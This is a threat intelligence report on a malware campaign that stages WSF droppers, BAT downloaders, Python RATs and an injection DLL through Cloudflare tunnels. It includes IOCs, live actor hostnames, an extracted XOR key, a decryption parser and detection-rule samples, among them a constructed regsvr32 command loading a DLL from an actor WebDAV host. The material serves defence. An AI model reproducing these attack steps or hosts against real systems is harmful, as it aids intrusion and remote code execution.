Severity: High | Category: Phishing

OPERATION KLEIN CHANGES — Breakglass Intelligence Report

Investigated: April 3, 2026 | Published: April 3, 2026
Tags: trycloudflare, kleinchanges, rat, dll-sideloading, cloudflare, wsf, wsgidav, tor

TLP: WHITE
Date: 2026-04-03
Analyst: GHOST (Breakglass Intelligence)
Classification: Cybercrime — Multi-Stage Malware via Cloudflare Tunnel Network
Status: 3 TUNNELS LIVE / 2 TUNNELS DEAD (as of 2026-04-03T18:22Z)
Related: Operation Crest Snake (2026-04-03), Operation Nutten Tunnel (2026-04-02)


Executive Summary

This investigation documents the klein-changes-slim-starter Cloudflare tunnel, which serves as the WSF dropper hosting node in a multi-tunnel malware delivery network previously identified in Operations Crest Snake and Nutten Tunnel. The tunnel hosts 6 Windows Script Files (WSF) that span the actor's operational history from January 14, 2026 through April 2, 2026, revealing a clear daily evolution in TTPs. The latest payload (UKApr02.wsf, deployed April 2) references a new staging tunnel (chubby-resident-airlines-converter) not previously documented, and shows the actor removing native DLL payloads in favor of a Python-only attack chain — a significant tactical shift within 24 hours. All 6 WSF files, 4 BAT stagers, and associated payloads have zero detections on VirusTotal and no prior reporting on any threat intelligence platform.

This is the same actor as Operations Crest Snake and Nutten Tunnel, confirmed by shared infrastructure (wet-envelope-beam-laser tunnel), identical SID (S-1-5-21-3343087317-1842942590-547433828-500), identical WsgiDAV platform, and consistent targeting patterns.

Key Findings

  • 6 WSF droppers spanning nearly three months of actor evolution (Jan 14 → Apr 2, 2026)
  • NEW tunnel discovered: chubby-resident-airlines-converter[.]trycloudflare[.]com — BAT stager host for April campaigns (LIVE)
  • Tactical shift observed: April 1 campaign uses Python RATs + DLL sideloading; April 2 campaign drops the DLL entirely — Python-only
  • XOR decryption key extracted: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 (32-byte key for magde.dat shellcode blob)
  • Decrypted shellcode: 350,924 bytes with CALL+POP loader (337KB encrypted data blob + 13.5KB PEB-walking loader)
  • DLL compiled with GCC 15.1.0 (MinGW-Builds) — unusually current compiler version
  • 5 total tunnels referenced in WSF files, mapping the actor's full tunnel rotation history
  • ZERO prior detections — all IOCs completely novel

What Was Found vs. What Was Known

Aspect | Prior Reporting (Crest Snake) | New Findings (Klein Changes)
WSF droppers | 1 (UKApr02.wsf reference) | 6 complete files with full source code
Tunnels mapped | 8 tunnels | 2 confirmed (triangle-county, peace-ray: both dead) + chubby-resident (NEW)
DLL analysis | jopfgl.dll identified, magde.dat noted | XOR key extracted, shellcode decrypted, GCC 15.1.0 compiler identified
Actor evolution | DLL→Python shift noted | Daily evolution documented: DLL+Python (Apr 1) → Python-only (Apr 2)
Historical payloads | Back to Sep 2025 | Jan 14, 2026 WSF using triangle-county tunnel (now dead)
DLL naming | jopfgl.dll, pnljjd.dll | emand.dll (Apr 1 stager), 4 DLL names from Mar 26 WSF
Persistence | Startup BAT documented | Two persistence scripts analyzed (1Mar23SU.bat + 1Mar23SU.txt) with 4 execution paths

Attack Chain Evolution — Timeline

January 14, 2026 — 1PhJ14.wsf (Earliest Klein Changes Payload)

1PhJ14.wsf → triangle-county-dangerous-soon.trycloudflare.com (DEAD)
  ├─ Downloads PhA1.txt → PhA1.bat → Executes (Stage 1)
  ├─ Sleeps 90 seconds
  └─ Downloads PhA2.txt → PhA2.bat → Executes (Stage 2)
  Staging dir: %USERPROFILE%\Contacts\

Note: 90-second sleep between stages (later reduced to 10 seconds by Mar 27).

March 25-26, 2026 — TheDll.wsf + UKMar26.wsf (DLL Sideloading Era)

TheDll.wsf + theDll.js → wet-envelope-beam-laser.trycloudflare.com (LIVE)
  ├─ regsvr32 /s pmgime.dll (silent DLL registration)
  └─ start rechung.pdf (German invoice decoy)

UKMar26.wsf → peace-ray-unnecessary-dave.trycloudflare.com (DEAD)
  ├─ regsvr32 /s As/dmmnknAsy.dll     (AsyncRAT?)
  ├─ regsvr32 /s An/pdmemeAna.dll     (AnyDesk?)
  ├─ regsvr32 /s Hv/klnaicHvvv.dll   (HVNC?)
  ├─ regsvr32 /s UK_vio/bgpdpduk-vio.dll (UK-targeted variant?)
  └─ start rechung.pdf (via wet-envelope, decoy)

Critical: 4 DLLs deployed simultaneously, categorized by subdirectories (As, An, Hv, UK_vio).

March 27, 2026 — UKMar27.wsf (Shift to BAT Stagers)

UKMar27.wsf → rover-earlier-baseline-karen.trycloudflare.com (DEAD)
  ├─ UKM301.txt → UKM301.bat → Execute → Wait 10s
  ├─ UKM302.txt → UKM302.bat → Execute → Wait 10s
  └─ UKM303.txt → UKM303.bat → Execute → Wait 10s
  Staging dir: %USERPROFILE%\Contacts\

Shift: Actor moves from direct DLL registration to multi-stage BAT downloaders. Three stages instead of two.

April 1, 2026 — UKA01 via chubby-resident (Python + DLL Hybrid)

UKApr02.wsf (Apr 1 variant) → chubby-resident-airlines-converter (LIVE)
  ├─ UKA011.txt → UKA011.bat (Stage 1: Downloader)
  │   ├─ Downloads 1Mar23MA.zip (16.7MB) → Python 3.12 x64 + 5 obfuscated .py RATs
  │   ├─ Downloads 1Mar23ST.zip (16.7MB) → Backup/stealer Python payload set
  │   ├─ Downloads 1MaDLL.zip (350KB) → jopfgl.dll + magde.dat (Early Bird injection DLL)
  │   └─ Downloads 1Mar23SU.txt → Startup persistence
  │   Source: highland-trend-src-distinct.trycloudflare.com
  │
  └─ UKA012.txt → UKA012.bat (Stage 2: Executor)
      ├─ Launches all .py in Python312x64\ directory
      ├─ regsvr32 /s %APPDATA%\TokenSys\emand.dll  ← NEW DLL NAME
      ├─ Kills Python processes whose parent is explorer.exe (via WMI)
      ├─ Hides directories (attrib +h)
      └─ Deletes all .bat files from Contacts (anti-forensics)

April 2, 2026 — UKA02 via chubby-resident (Python ONLY)

UKApr02.wsf → chubby-resident-airlines-converter (LIVE)
  ├─ UKA021.txt → UKA021.bat (Stage 1: Downloader)
  │   ├─ Downloads 1Mar23MA.zip (16.7MB) → Python 3.12 x64 + 5 obfuscated .py RATs
  │   ├─ Downloads 1Mar23ST.zip (16.7MB) → Backup/stealer Python payload set
  │   ├─ ** NO DLL DOWNLOAD ** ← DLL COMPONENT REMOVED
  │   └─ Downloads 1Mar23SU.txt → Startup persistence
  │
  └─ UKA022.txt → UKA022.bat (Stage 2: Executor)
      ├─ Launches all .py in Python312x64\ directory
      ├─ ** NO DLL REGISTRATION ** ← DLL STEP REMOVED
      ├─ Kills Python processes whose parent is explorer.exe (via WMI)
      ├─ Hides directories (attrib +h)
      └─ Deletes all .bat files from Contacts (anti-forensics)

CRITICAL EVOLUTION: The actor removed the DLL component between April 1 and April 2. This suggests either: (a) the DLL was being detected/flagged, (b) the Python payloads proved sufficient, or (c) the actor is testing which approach has better success rates.

DLL Analysis — jopfgl.dll (from 1MaDLL.zip)

Property | Value
SHA256 | 3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
Type | PE32+ DLL (x86-64), stripped
Size | 16,896 bytes
Compiled | 2026-03-30T10:03:18 UTC (PE header timestamp; forgeable, but consistent with the Mar 30 1MaDLL.zip deployment)
Compiler | GCC 15.1.0 (MinGW-Builds, x86_64-posix-seh-rev0)
Exports | DllRegisterServer, DllUnregisterServer, get_payload, inject_early_bird, xor_decrypt
XOR Key | vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 (32 bytes, embedded in .rdata)

Decrypted Shellcode (magde.dat XOR decrypted)

Property | Value
SHA256 (encrypted) | f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
SHA256 (decrypted) | 22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878
Size | 350,924 bytes
Structure | 5-byte CALL +0x525c0 at offset 0, skipping a 337,344-byte inner encrypted data blob and landing in a 13,575-byte PEB-walking loader (5 + 337,344 + 13,575 = 350,924)
Loader Entry | POP RCX; PUSH RBP; MOV RBP, RSP (the POP recovers the return address pushed by the CALL, i.e. the start of the data blob)
Pattern | Identical to Nutten Tunnel shellcode architecture (CALL+POP, PEB walk)
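Added example (analyst tooling written for this write-up, not code recovered from jopfgl.dll or any actor tooling): repeating-key XOR decryption with the extracted key, followed by a parser that validates the CALL+POP layout by reading the rel32 of the leading E8 CALL, deriving the inner data blob and loader boundaries, and checking for the POP RCX; PUSH RBP; MOV RBP, RSP prologue at the CALL target. The blob it runs on is constructed here to exercise the parser; it is not magde.dat, whose bytes this report does not reproduce. Feeding the report's figures (350,924 bytes, CALL +0x525c0) to call_pop_layout reproduces the 337,344 / 13,575 split given above.

```python
"""XOR-decrypt a shellcode blob and map its CALL+POP loader (added example).

The key is the one this report extracted from jopfgl.dll's .rdata; the blob
built by build_sample() is CONSTRUCTED to exercise the parser and is not
magde.dat.
"""
import struct

XOR_KEY = b"vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4"  # 32-byte repeating key (from the report)
# Loader entry the report names: POP RCX (59); PUSH RBP (55); MOV RBP, RSP (48 89 E5)
LOADER_PROLOGUE = bytes.fromhex("59554889e5")


def xor_decrypt(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; symmetric, so the same call re-encrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def call_pop_layout(total_len: int, rel32: int) -> dict:
    """Layout implied by a blob that opens with E8 <rel32>.

    The 5-byte CALL pushes the address of the byte after itself (the start of
    the data the loader will process) and jumps rel32 bytes forward, past that
    data, into the loader, which recovers the pointer with POP.
    """
    data_off = 5
    loader_off = data_off + rel32
    if not data_off < loader_off < total_len:
        raise ValueError("CALL target is not inside the blob")
    return {
        "data_off": data_off,
        "data_len": loader_off - data_off,
        "loader_off": loader_off,
        "loader_len": total_len - loader_off,
    }


def parse_call_pop(shellcode: bytes) -> dict:
    """Validate the CALL+POP pattern and return its layout plus a prologue check."""
    if len(shellcode) < 5 or shellcode[0] != 0xE8:
        raise ValueError("blob does not start with a near CALL (E8)")
    rel32 = struct.unpack_from("<i", shellcode, 1)[0]
    layout = call_pop_layout(len(shellcode), rel32)
    at = layout["loader_off"]
    layout["prologue_ok"] = shellcode[at:at + len(LOADER_PROLOGUE)] == LOADER_PROLOGUE
    return layout


def build_sample(data_len: int = 64, loader_pad: int = 11) -> bytes:
    """CONSTRUCTED plaintext blob: CALL over data_len bytes into a stub loader."""
    data = bytes((i * 7) & 0xFF for i in range(data_len))
    loader = LOADER_PROLOGUE + b"\xCC" * loader_pad  # int3 padding stands in for the real loader
    return b"\xE8" + struct.pack("<i", data_len) + data + loader


def analyze_encrypted(blob: bytes, key: bytes = XOR_KEY) -> dict:
    """What an analyst runs on the on-disk file: decrypt, then parse the layout."""
    return parse_call_pop(xor_decrypt(blob, key))


if __name__ == "__main__":
    encrypted = xor_decrypt(build_sample())        # stand-in for magde.dat
    print(analyze_encrypted(encrypted))
    print(call_pop_layout(350_924, 0x525C0))       # the report's real figures
```

A failed prologue check with a valid CALL is the case to watch for: it usually means the wrong key, a wrong key alignment (the blob was stored with a header the XOR loop skips), or a loader variant that has changed its first instruction.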

Persistence Analysis — Dual Script System

1Mar23SU.txt (Current, Mar 27 2026)

Executes Python payloads on startup through four paths:

  1. %APPDATA%\Winic\30.3.0rc50\Python312x32\ — 32-bit Python, Mode 2 (kills Python instances parented by explorer.exe or nslookup.exe)
  2. %USERPROFILE%\Contacts\Str\python312x64\ — 64-bit Python, Mode 1 (kills Python instances parented by explorer.exe only)
  3. %USERPROFILE%\Contacts\Str\python312x644\ — 64-bit Python duplicate
  4. DiscordDial.vbs WMI helper, used for the parent-based process termination in modes 1 and 2

1Mar23SU.bat (Original, Dec 15 2025)

Earlier version using PowerShell for process killing instead of VBS/WMI:

  1. %USERPROFILE%\Videos\3DAus\python312x32\ — 32-bit Python
  2. %USERPROFILE%\Contacts\Str\python312x64\ — 64-bit Python

Evolution: Actor moved from PowerShell-based process termination (exposed to script block logging and AMSI, and a common EDR trigger) to a VBS+WMI approach that generates no PowerShell telemetry. It is not invisible: the helper still shows up as wscript.exe launched from the Contacts folder and as Win32_Process queries and terminations via WMI.

Infrastructure Map — All Tunnels Referenced

# | Tunnel Subdomain | Status | Role | First Seen | Referenced By
1 | klein-changes-slim-starter | LIVE | WSF dropper hosting | 2026-01-14 | Direct investigation target
2 | chubby-resident-airlines-converter | LIVE | BAT stager hosting (Apr 1-2) | 2026-04-01 | UKApr02.wsf, UKMar27.wsf→UKA01
3 | wet-envelope-beam-laser | LIVE | DLL + LNK + PDF decoy hosting | 2026-03-25 | TheDll.wsf, UKMar26.wsf, FSL_DE LNK
4 | highland-trend-src-distinct | LIVE | ZIP payload hosting (Python+DLL) | 2025-11-28 | UKA011.txt, UKA021.txt
5 | triangle-county-dangerous-soon | DEAD | Historical BAT stager (Jan 2026) | 2026-01-14 | 1PhJ14.wsf
6 | peace-ray-unnecessary-dave | DEAD | Historical DLL host (Mar 2026) | 2026-03-26 | UKMar26.wsf
7 | rover-earlier-baseline-karen | DEAD | Historical BAT stager (Mar 2026) | 2026-03-27 | UKMar27.wsf
8 | crest-ind-snake-dublin | LIVE | Lure WSH hosting | 2026-04-02 | Crest Snake investigation
9 | requires-fortune-nutten-eligible | LIVE | German lure campaign | 2026-03-23 | Nutten Tunnel investigation

Total mapped tunnels across all 3 investigations: 9

DLL Naming Pattern Analysis

The actor uses distinct DLL names across campaigns, suggesting modular payloads:

DLL Name | Campaign | Suspected Purpose | Tunnel
pnljjd.dll | Mar 25 (German LNK) | Unknown (sideloaded via regsvr32) | wet-envelope
pmgime.dll | Mar 25-26 (TheDll.wsf) | Unknown (sideloaded via regsvr32) | wet-envelope
dmmnknAsy.dll | Mar 26 (UKMar26) | AsyncRAT variant (name contains "Asy") | peace-ray
pdmemeAna.dll | Mar 26 (UKMar26) | AnyDesk RAT (name contains "Ana") | peace-ray
klnaicHvvv.dll | Mar 26 (UKMar26) | HVNC (name contains "Hvvv") | peace-ray
bgpdpduk-vio.dll | Mar 26 (UKMar26) | UK-targeted variant (name contains "uk-vio") | peace-ray
jopfgl.dll | Mar 30 (1MaDLL.zip) | Early Bird APC injection loader | highland-trend
emand.dll | Apr 1 (UKA012.bat) | Unknown (extracted to TokenSys) | highland-trend→local

Actor OPSEC Failures

  1. SID embedded in LNK: S-1-5-21-3343087317-1842942590-547433828-500 — Administrator account, consistent across campaigns
  2. VPS build environment: Machine name vps-756346 — numbered VPS, likely cloud instance
  3. XOR key in plaintext: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 — hardcoded in DLL .rdata section
  4. DLL naming reveals payload purpose: Asy=AsyncRAT, Ana=AnyDesk, Hvvv=HVNC, uk-vio=UK variant
  5. Date-based WSF naming: UKMar26, UKMar27, UKApr02 — reveals operational calendar
  6. Anonymous read-write WebDAV: All tunnels allow unauthenticated writes
  7. Evolution artifacts preserved: All 6 WSF files remain on klein-changes tunnel, showing full TTP evolution
  8. Compiler version: GCC 15.1.0 — very recent (released 2025), narrows developer profile

MITRE ATT&CK Mapping

Tactic | Technique | ID | Application
Initial Access | Phishing: Spearphishing Link | T1566.002 | LNK files disguised as PDFs with Edge icon
Execution | Command and Scripting Interpreter: Visual Basic | T1059.005 | WSF/VBS stages run under Windows Script Host (theDll.js falls under JavaScript, T1059.007)
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Multi-stage BAT downloaders
Execution | Command and Scripting Interpreter: Python | T1059.006 | Kramer-obfuscated Python RAT payloads
Execution | System Binary Proxy Execution: Regsvr32 | T1218.010 | DLL registration via regsvr32 /s
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | BAT files in the user Startup folder
Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | XOR decryption of shellcode, Kramer Python obfuscation
Defense Evasion | Hide Artifacts: Hidden Files and Directories | T1564.001 | attrib +h on payload directories
Defense Evasion | Process Injection: Asynchronous Procedure Call | T1055.004 | inject_early_bird export in jopfgl.dll (Early Bird APC)
Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Deletes all BAT files from Contacts after execution
Defense Evasion | Masquerading: Double File Extension | T1036.007 | .PDF.lnk lure carrying the Edge browser icon
Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | WebDAV over HTTPS via Cloudflare tunnels
Command and Control | Proxy: External Proxy | T1090.002 | Cloudflare edge proxying hides the origin host
Command and Control | Ingress Tool Transfer | T1105 | Payloads pulled onto the victim over WebDAV from the tunnels (transfer into the host, not lateral movement between victim hosts)

IOC Summary

Network Indicators

IOC | Type | Status
klein-changes-slim-starter[.]trycloudflare[.]com | Domain | LIVE
chubby-resident-airlines-converter[.]trycloudflare[.]com | Domain | LIVE
wet-envelope-beam-laser[.]trycloudflare[.]com | Domain | LIVE
highland-trend-src-distinct[.]trycloudflare[.]com | Domain | LIVE
triangle-county-dangerous-soon[.]trycloudflare[.]com | Domain | DEAD
peace-ray-unnecessary-dave[.]trycloudflare[.]com | Domain | DEAD
rover-earlier-baseline-karen[.]trycloudflare[.]com | Domain | DEAD

File Indicators

WSF Droppers (from klein-changes tunnel)

SHA256 | Filename | Date
13a6420822dab0d4ca6c1b422c66e5dd3a59637588279097efe47f7e553eb849 | 1PhJ14.wsf | 2026-01-14
f38cd6aa26981ba1eea4fb0ec8f9db212e518f65f28556e108ef74d92e4809b6 | TheDll.wsf | 2026-03-26
bd3a7e2805d2f6f371366d6847998843b98298a748c45dd3ef6014b85697c4ae | UKMar26.wsf | 2026-03-27
6b45e1a38609b9b7f2f2508b0b38f700a75ee1ea9b6c548d1a086bd91863efc3 | UKMar27.wsf | 2026-03-30
79eb3a25e8cd93bda05e3f86897de2d057a776be68a95586eedad6566c79c2c4 | UKApr02.wsf | 2026-04-02
f2caaf774ab4ac5e7b5d9299117eb1bad22e025a2e530ffc29496456760390b6 | theDll.js | 2026-03-26

BAT Stagers (from chubby-resident tunnel)

SHA256 | Filename | Date
a05ca4e0e257ee5bd584ddd8dfdb3d5c9f6d87dbc46b7afe1c1e6a0ab6467c4e | UKA011.txt | 2026-04-01
7fd6934f8fd8ef0e78ae37ab04f31aed8543a8bd2a1dac0b388ce8fe074c3086 | UKA012.txt | 2026-04-01
53dfef40de6d91c71ff6ae676a609bd1e82a70c6cf9478a89909ee7e258b516e | UKA021.txt | 2026-04-02
218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c | UKA022.txt | 2026-04-02

DLL Payloads

SHA256 | Filename | Description
3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd | jopfgl.dll | Early Bird APC injection DLL (GCC 15.1.0)
f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7 | magde.dat | XOR-encrypted shellcode (350KB)
22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878 | magde_decrypted.bin | Decrypted shellcode (CALL+POP loader)
314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1 | 1MaDLL.zip | DLL payload archive

LNK Lure

SHA256 | Filename | Description
5e112f4229dd70373d9d348fc649a1de971243c610f83e80b95a24910375b28e | FSL_DE_INV_24032026_238969_EML.PDF.lnk | German invoice lure (Edge icon disguise)

Persistence Scripts

SHA256 | Filename | Description
766ab64ffd028972b40e7c171525891b1f06a9d381b3f5072de82d77b29f7682 | init.cmd | DLL self-registration script

Behavioral Indicators

  • Staging directory: %USERPROFILE%\Contacts\ (all campaigns)
  • Python install: %USERPROFILE%\Contacts\MainRingtones\python312x64\
  • Backup Python: %USERPROFILE%\Contacts\str\python312x64\
  • 32-bit Python: %APPDATA%\Winic\30.3.0rc50\Python312x32\
  • DLL staging: %APPDATA%\TokenSys\ (Apr 1 only)
  • Persistence: Random-named .bat in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
  • VBS helper: %USERPROFILE%\Contacts\DiscordDial.vbs (WMI process termination)
  • VBS launcher: %USERPROFILE%\Contacts\rhn.vbs / rhnE.vbs (hidden window relaunch)
  • Temp directory: %USERPROFILE%\Contacts\docuts\ (ZIP extraction, deleted after)
  • XOR Key: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4
  • SID: S-1-5-21-3343087317-1842942590-547433828-500
  • Machine Name: vps-756346

Recommendations

Immediate (24-48 hours)

  1. Block all 9 trycloudflare tunnel domains at DNS/proxy level; Quick Tunnel hostnames are disposable and this actor rotates them, so also alert on (or, where there is no business use, block) any *.trycloudflare.com resolution rather than relying on the listed names alone
  2. Hunt for %USERPROFILE%\Contacts\MainRingtones\ and %USERPROFILE%\Contacts\str\ directories
  3. Check Windows Startup folder for unknown .bat files
  4. Search for DiscordDial.vbs and rhn.vbs in Contacts folder
  5. Monitor regsvr32 execution with WebDAV UNC paths
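Added example (written for this write-up, not from the report, the actor, or any vendor product): the host-level hunts above expressed as rule logic run over process-creation records. The record schema (image, cmdline, parent) and the eight sample events are constructed here; the WebDAV UNC form (\\host@SSL\DavWWWRoot\...) is the standard Windows mini-redirector syntax and is assumed, since the report does not quote the actor's exact regsvr32 command line. In production the same rules would be fed from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.

```python
"""Rule logic for the host-level hunts in this report (added example).

Record schema and sample events are CONSTRUCTED for this write-up; the
staging paths, tool names and file names come from the report.
"""
import re

# (rule name, regex on image basename, regex on command line); both lower-cased before matching
RULES = [
    # regsvr32 /s loading a DLL from a UNC/WebDAV path or a trycloudflare host (T1218.010)
    ("regsvr32_webdav", r"^regsvr32", r"/s\b.*(\\\\|@ssl|davwwwroot|trycloudflare\.com)"),
    # WSH running a .wsf/.vbs/.js staged in Contacts (DiscordDial.vbs, rhn.vbs)
    ("wsh_from_contacts", r"^(wscript|cscript)", r"\\contacts\\.*\.(wsf|vbs|js)\b"),
    # Python interpreter living under Contacts\ or %APPDATA%\Winic\
    ("python_from_staging", r"^python", r"\\(contacts|winic)\\"),
    # attrib +h applied inside the Contacts staging tree (T1564.001)
    ("attrib_hide_staging", r"^attrib", r"\+h\b.*\\contacts\\"),
    # cmd deleting the .bat stagers from Contacts (T1070.004)
    ("bat_cleanup", r"^cmd", r"\bdel\b.*\\contacts\\.*\.bat\b"),
    # any process launched with a .bat in the user Startup folder (T1547.001)
    ("startup_bat", r".", r'\\start menu\\programs\\startup\\[^"]*\.bat\b'),
]
COMPILED = [(name, re.compile(img), re.compile(cmd)) for name, img, cmd in RULES]


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_event(event: dict) -> list:
    """Return the rule names that fire for one process-creation record."""
    img = basename(event["image"])
    cmd = event["cmdline"].lower()
    return [name for name, img_re, cmd_re in COMPILED if img_re.search(img) and cmd_re.search(cmd)]


def triage(events: list) -> list:
    """(index, rule) for every hit across a batch of records, in input order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in match_event(ev)]


# CONSTRUCTED sample: six events modelled on the chain in this report, then two benign ones.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": "wscript.exe",
     "cmdline": r'regsvr32 /s "\\wet-envelope-beam-laser.trycloudflare.com@SSL\DavWWWRoot\pmgime.dll"'},
    {"image": r"C:\Windows\System32\wscript.exe", "parent": "cmd.exe",
     "cmdline": r'wscript.exe //B "C:\Users\victim\Contacts\DiscordDial.vbs"'},
    {"image": r"C:\Users\victim\Contacts\MainRingtones\python312x64\python.exe", "parent": "cmd.exe",
     "cmdline": r'"C:\Users\victim\Contacts\MainRingtones\python312x64\python.exe" "C:\Users\victim\Contacts\MainRingtones\python312x64\a1.py"'},
    {"image": r"C:\Windows\System32\attrib.exe", "parent": "cmd.exe",
     "cmdline": r"attrib +h C:\Users\victim\Contacts\Str"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": "cmd.exe",
     "cmdline": r"cmd.exe /c del /q C:\Users\victim\Contacts\*.bat"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": "explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xkq9.bat"'},
    # benign: local system DLL registration and a normal Python install
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": "msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"image": r"C:\Program Files\Python312\python.exe", "parent": "explorer.exe",
     "cmdline": r'"C:\Program Files\Python312\python.exe" -m pip list'},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The regsvr32 rule deliberately requires both the /s switch and a remote-looking source; dropping either half turns it into a noise generator on hosts that register local COM DLLs during software installs.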

Short-term (1-2 weeks)

  1. Deploy YARA rules for WSF dropper patterns and DLL exports
  2. Deploy Suricata rules for WsgiDAV WebDAV traffic patterns
  3. Monitor Cloudflare Quick Tunnel DNS for new subdomains by this actor
  4. Submit all IOCs to MalwareBazaar, ThreatFox, URLhaus

Medium-term (1-3 months)

  1. Monitor highland-trend tunnel for payload updates (refreshed daily)
  2. Track actor tunnel rotation patterns (new tunnel every 3-7 days)
  3. Watch for GCC 15.1.0 MinGW-built DLLs with similar export patterns
